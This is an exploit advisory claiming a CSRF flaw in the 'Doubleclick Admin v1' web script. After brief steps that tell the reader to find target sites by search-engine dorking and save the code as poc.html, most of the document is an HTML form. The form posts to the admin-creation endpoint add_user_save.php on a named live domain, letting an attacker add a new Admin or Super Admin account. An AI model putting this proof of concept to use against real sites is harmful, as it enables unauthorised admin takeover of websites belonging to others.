====================================================================================================================================
| # Title     : Doubleclick Admin v1 CSRF Vulnerability                                                                            |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | 
| # Vendor    : https://codecanyon.net/                                                                                            |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 2.

[+] Set the target site link Save changes and apply . 

[+] infected file : /sadmin/add_user_save.php.

[+] http://127.0.0.1/q7.3/sadmin/add_user_save.php.

[+] save code as poc.html .

<br>
                    <form action="https://oecglobalnet/application/sadmin/add_user_save.php" method="post" name="formObj" onsubmit="return Check()">
                      <table width="96%" cellspacing="0" cellpadding="0" border="0" align="center">
                        <tbody><tr> 
                          <td valign="top" height="30"> <table bordercolorlight="#d9d9d9" bordercolordark="#ffffff" width="100%" cellspacing="0" cellpadding="4" bordercolor="#d9d9d9" border="1" align="center">
                              <tbody><tr> 
                                <td valign="middle" bgcolor="F5F5F5">ชื่อผู้ใช้งาน 
                                  :</td>
                                <td bgcolor="#FFFFFF"><input name="user" type="text" class="inputbox" id="user" size="30" maxlength="10" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'" onkeypress="check_userpass()"> 
                                  <font color="#FF0000">*</font> </td>
                              </tr>
							  <tr> 
                                <td valign="middle" bgcolor="F5F5F5">Level 
                                  :</td>
                                <td bgcolor="#FFFFFF"> 
									<input type="radio" name="level" value="1"> Supper Admin
									<input type="radio" name="level" value="2" checked=""> Admin
                                </td>
                              </tr>
                              <tr> 
                                <td valign="middle" bgcolor="F5F5F5">รหัสผ่าน 
                                  :</td>
                                <td bgcolor="#FFFFFF"><input name="pass" type="password" class="inputbox" id="pass" size="30" maxlength="30" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'" onkeypress="check_userpass()"> 
                                  <font color="#FF0000">*</font> </td>
                              </tr>
                              <tr> 
                                <td valign="middle" bgcolor="F5F5F5">ยืนยันหรัสผ่าน 
                                  :</td>
                                <td bgcolor="#FFFFFF"><input name="pass2" type="password" class="inputbox" id="pass2" size="30" maxlength="30" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'" onkeypress="check_userpass()"> 
                                  <font color="#FF0000">*</font> </td>
                              </tr>
                              <tr> 
                                <td width="14%" valign="top" bgcolor="F5F5F5">&nbsp; 
                                </td>
                                <td width="86%" bgcolor="#FFFFFF"> <div align="left"> 
                                    <input type="submit" name="Submit" value=" Save ">
                                  </div></td>
                              </tr>
                            </tbody></table></td>
                        </tr>

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================